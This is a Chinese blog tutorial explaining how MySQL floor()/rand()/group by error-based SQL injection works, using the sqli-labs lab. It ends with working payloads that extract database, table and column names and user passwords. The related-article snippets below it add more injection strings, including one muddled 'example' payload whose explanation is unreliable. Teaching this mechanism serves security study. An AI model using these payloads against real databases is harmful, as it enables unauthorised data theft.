Floor报错注入原理解析心得

最新推荐文章于 2025-03-18 16:44:11 发布
最新推荐文章于 2025-03-18 16:44:11 发布
阅读量3.6k 收藏 36
点赞数 9
分类专栏: 渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_27130557/article/details/120902212
版权

目录

前言

相关函数

1.floor()

2.rand(x)

3.count(*)

Floor报错原理分析

1.group by和conut

2.group by 和rand

对rand(0)*2的优化

前言

floor报错注入称group报错注入,由于一直使用但是不知道其原理,看了酒仙桥六号部队的文章后,恍然大悟,遂其记录下来。

相关函数

1.floor()

向下取整。

即取不大于x的最大整数。取按照数轴上最接近要求值的左边值。

 

2.rand(x)

随机产生一个0-1之间的浮点数

 

指定参数x之后,会生成固定的伪随机序列。即固定了参数,之后每次生成的值都是一样的,故称之为固定的伪随机数字(产生的数字都是可预知的

rand(0)*2

产生一个伪随机序列(结果已知),因为*2,所以返回结果只能是0或1

3.count(*)

返回值的条目,与count()的区别在于其不排除NULL,count()如果统计到NULL,返回的结果即为NULL

Floor报错原理分析

以sqli-labs靶场为例

先来看一下users表中的数据。

 

执行以下floor报错注入语句

select count(*) from users group by concat(database(),floor(rand(0)*2));

 

上面的SQL语句可以直接爆出数据库名

其原理是:

1.group by和conut

在使用group by 和count后,group by 会依次从users表中查询记录,建立一张虚拟的表,当表中的Key(主键)存在时,count会自动+1,如果key不存在,则将key插入到临时表中

 

例如,现在去users表中第一条记录,username为Dumb,发现临时表中没有该key(主键),则将该key插入到临时表中,count记为1

 

同样在查询第二条语句时,username为Angelina,临时表中也没有该key,直接将key插入到临时表中,count记为1。

最终结果如下:

 

 

2.group by 和rand

而当group by与rand一起使用时,如果临时表中没有该主键,rand会再计算一次,率先将第二次的计算结果插入到临时表,导致主键重复报错(也就是这个特性导致报错)

 

执行顺序如下:

执行group by时database()被执行,得到security,再经过floor(rand(0)*2),最后concat为security0。

此时临时表中没有此键,会再次rand(0)*2计算一次,此时得到的结果是security1,直接将security1插入到临时表中,并且count计数为1

 

读取第二条数据时,group by的key中的0 1仍然由floor(rand(0)*2)计算所得,第二次计算的结果是1,则key为security1,这时候会查询临时表,临时表中已有security1的key,所以count直接+1

 

同理,继续读取第三条记录,第三次的key为security0(依次往下读),但是此时临时表没有此key,所以会向下计算,得出key为security1,直接将security1插入到临时表中,因为与上面键名重复,所以导致了报错。

对rand(0)*2的优化

由以上结果,可以得知rand(0)*2的结果固定如下(此处只列取13位):

结果固定为011011...,即当数据有3条及以上时才会触发报错。

而rand(14)*2的结果如下:

结果:101000.... 当数据满足2条及以上即可触发报错

例如:

新建一个表,给表中插入两条数据如下

rand(0)*2不返回报错

rand(14)*2返回报错

 

最后一句话总结下:floor()报错注入的原因是group by在向临时表插入数据时,由于rand()多次计算导致插入临时表时主键重复,从而报错,又因为报错前concat()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或函数执行后的结果。

暴库

select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a;

暴表

select 1 from (select count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x)a;

爆字段

select 1 from (select count(*),concat((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),floor(rand(14)*2))x from information_schema.tables group by x)a

爆数据

select 1 from (select count(*),concat((select group_concat(password) from users),floor(rand(14)*2))x from information_schema.tables group by x)a;

总结:floor()报错注入的原因是group by在向临时表插入数据时,由于rand()多次计算导致插入临时表时主键重复,从而报错,又因为报错前concat()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或函数执行后的结果。

参考链接:

酒仙桥六号部队

关于floor()报错注入,你真的懂了吗? - SecPulse.COM | 安全脉搏

sql注入-5floor报错注入
技术骨干小李的博客
07-20 715
floor报错注入的基本学习
Sql注入学习笔记——MySQL显错注入
qq_44720214的博客
07-26 1371
显错注入又叫报错注入,其原理是通过利用数据库的某些机制,人为地制造错误条件使得查询结果能够出现在错误信息中。
sql注入中的floor报错注入原理详解
哦 卷!
10-25 3126
floor()报错注入的原因是group by在向统计表插入数据时,由于rand()多次计算导致插入统计表时主键重复,从而报错。又因为报错前concat_ws()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或函数执行后的结果。
C++中的floor()函数,ceil()函数,round()函数
ml29895063的博客
03-18 471
C++中的floor()函数,ceil()函数,round()函数
floor报错注入原理解析
weixin_54894046的博客
05-24 1890
报错需要满足的条件: floor()报错注入在MySQL版本8.0 已失效,经过测试7.3.4nts也已失效(据说的 本人没有实践过) 注入语句中查询用到的表内数据必须>=3条 需要用到的count(*)、floor()或者ceil()、rand()、group by rand()函数详解 RAND() RAND(N) 返回一个随机浮点值 v ,范围在 0 到1 之间 (即, 其范围为 0 ≤ v ≤ 1.0)。若已指定一个整数参数 N ,则它被用作种子值,用来产生重复序列。 通俗点
SQL注入floor报错注入的形成原理分析
Neonline254的博客
01-13 1624
进行SQL注入时,相信很多同学在遇到前端不回显时,会尝试SQL报错注入。常见的报错注入有:floor报错注入、updatexml报错注入和extractvalue报错注入等,不同于后两者利用Xpath解析错误,floor报错注入的成因更加复杂。本文将详细地分析floor报错注入的成因,希望能对您有所帮助。
【web安全】——floor报错注入
Demo不是emo的博客
01-06 1万+
floor报错注入深度剖析
sql group by 取每组第一条_【SQL注入】关于floor()报错注入,你真的懂了吗?
weixin_39747383的博客
11-30 294
这是酒仙桥六号部队的第35篇文章。全文共计2459个字,预计阅读时长9分钟。简述floor报错注入也有叫group报错注入的,都一样,指的都是他们。floor报错注入我想大多数人跟我一样,都是会用而不明白其中的原理。这个问题困扰了在下好长时间了,所以决定好好研究下,最终产出了这篇文章,如果各位观众老爷觉得写的还行,麻烦点个关注,如果有问题也请直接联系指正,在下有礼了~环境介绍下我...
sqli-lab的小白菜通关大合集
wo41ge的博客
07-12 463
使用注释符:减减加,减减空格,# LIMIT 0,1 第一位0是从第几个开始,第二位的1代表的就是显示多少数据 or and 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema=‘security’ 查字段:select column_name from information_schema.columns
传智播客 .NET面试宝典(2014版)
qq_34573534的博客
09-24 1452
.Net工程师面试笔试宝典 由于这套面试题涉及的范围很泛,很广,很杂,大家不可能一天两天就看完和学完这套面试宝典,即使你已经学过了有关的技术,那么至少也需要一个月的时间才能消化和掌握这套面试宝典,所以,大家应该早作准备,从拿到这套面试宝典之日起,就要坚持在每天闲暇之余学习其中几道题目,日积月累,等到出去面试时,一切都水到渠成,面试时就自然会游刃有余了。 回答问题的思路:先正面叙述一些基本...
floor()报错注入
热门推荐
超人学飞的日子
06-11 1万+
floor()报错注入准确地说应该是floor,count,group by冲突报错是当这三个函数在特定情况一起使用产生的错误。首先看经典的floor注入语句:and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)第一眼看...
基于联合查询的字符型GET注入
Z_l123的博客
02-16 1261
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后报错! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
mysql floor报错注入_mysql报错注入原理分析之floor()-阿里云开发者社区
weixin_36364419的博客
01-27 199
环境:mysql 5.1.73[root@localhost ~]# mysql --versionmysql Ver 14.14 Distrib 5.1.73, for redhat-linux-gnu (x86_64) using readline 5.1[root@localhost ~]#1.首先普及几个mysql里面的函数floor()在mysql里面floor()函数是取整(注意:不...
sql注入floor报错注入原理
Bu2n的博客
12-16 1322
floor()报错 利用语句 需要配合联合查询 -1 union select count(*) from information_schema.tables group by concat(floor(rand(0)*2) ,database()) 原理 count(*)与group by配合使用过程会产生一张空的虚拟表,接着逐个查询group_key插入虚拟表中,插完调用count() 插入虚拟表过程 在查询数据的时候,首先判断虚拟表是否存在该分组,如果存在,计数器+1,不存在则新建该分组 floor(
mysql floor报错注入_MySQL floor()报错原理
weixin_33397740的博客
01-27 497
简述floor报错注入也有叫group报错注入的,都一样,指的都是他们。floor报错注入我想大多数人跟我一样,都是会用而不明白其中的原理。这个问题困扰了在下好长时间了,所以决定好好研究下,最终产出了这篇文章,如果各位观众老爷觉得写的还行,麻烦点个关注,如果有问题也请直接联系指正,在下有礼了~ 。环境介绍下我的测试环境:MySQL版本:5.5.53使用的数据库:security.users,这数据...
mysql报错注入原理分析之floor()
weixin_33872566的博客
06-06 786
环境:mysql 5.1.73 [root@localhost ~]# mysql --version mysql Ver 14.14 Distrib 5.1.73, for redhat-linux-gnu (x86_64) using readline 5.1 [root@localhost ~]# ...
Floor报错原理分析
weixin_33705053的博客
02-26 258
最近开始打ctf了,发现好多sql注入都忘了,最近要好好复习一下。 基础知识: floor(): 去除小数部分 rand(): 产生随机数 rand(x): 每个x对应一个固定的值,但是如果连续执行多次值会变化,不过也是可预测的 floor报错payload: select count(), floor(rand(0)2) as a from information_schema.tables...
floor报错注入
My笔记的博客
09-27 1291
向下取整。
SQL注入——floor报错注入
heyingcheng的博客
03-07 411
rand()函数进行分组group by和统计count()时可能会多次执行,导致键值key重复,从而导致报错。group by子句:分组语句,常用于,结合统计函数,根据一个或多个列,对结果进行分组。floor()函数:小数向下取整。concat_ws()函数:将括号内数据用第一个字段连接起来。根据users表里面有多少行,rand()就计算多少次。根据from后面的表中有多少行,前面的函数就执行多少次。rand()函数:随机返回0~1间的小数。count()函数:汇总统计数量。随机返回0~1间的小数。
sqli-labs floor报错注入
最新发布
03-20
### 关于 SQLi Labs 中 Floor 函数错误注入的学习与解决 SQL 注入是一种常见的安全漏洞,其中攻击者通过输入恶意的 SQL 查询来操纵数据库的行为。Floor 错误注入属于一种基于错误的 SQL 注入技术,在这种情况下,MySQL 数据库会返回详细的错误消息,这些消息可能泄露有关查询结构的信息。 #### 地址与环境准备 为了测试 Floor 错误注入,可以按照以下方式设置实验环境: 1. **下载并安装 sqli-labs** 可以访问 GitHub 上的项目页面[^2],克隆或下载 `sqli-labs` 到本地,并将其放置在 Web 服务器的根目录下(例如 PHPStudy 的默认路径)。完成后启动服务。 2. **创建数据库和用户权限** 使用 MySQL 创建名为 `security` 的数据库以及相应的表数据[^1]。具体操作如下: ```sql CREATE DATABASE security; USE security; SOURCE /var/www/html/sqli-labs/Less-1/to-Less-55/DB/Dumb.sql; GRANT ALL PRIVILEGES ON security.* TO 'sqli'@'localhost' IDENTIFIED BY 'sqli'; FLUSH PRIVILEGES; ``` 3. **验证 Floor 错误注入场景** 在某些练习中可能会遇到 Floor 函数引发的语法错误提示,类似于以下内容[^3]: ``` You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1' LIMIT 0,1' ``` #### Floor 错误注入原理分析 当利用 Floor 函数进行错误注入时,通常依赖于 MySQL 对非法参数处理的方式。如果传递给 Floor 的值不是合法数值,则可能导致内部计算失败从而触发异常。此时可以通过精心构造 payload 来提取目标系统的敏感信息。 以下是实现 Floor 错误注入的一个典型例子: ```sql SELECT FLOOR(POWER(EXTRACTVALUE(NULL,(SELECT VERSION())),RAND()*9e8)); ``` 此语句尝试调用 EXTRACTVALUE() 方法读取版本号字符串作为 XML 节点解析器的内容,但由于传入 NULL 参数而故意制造了一个致命错误。与此同时,FLOOR 和 POWER 组合用于放大随机数范围以便更容易捕获特定模式下的回显片段。 需要注意的是,实际应用过程中应当调整 Payload 形式适配不同上下文中变量名长度限制等因素的影响。 #### 学习资源推荐 对于希望深入理解 Floor 错误注入机制及其防御措施的人士来说,可以从以下几个方面入手获取更多知识: - 官方文档:查阅官方手册了解每种内置函数的具体行为特征。 - 社区讨论:参与 OWASP 或其他信息安全论坛上的主题交流分享经验技巧。 - 教程视频:观看 YouTube 平台上由专家录制的相关教学录像获得直观演示效果。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值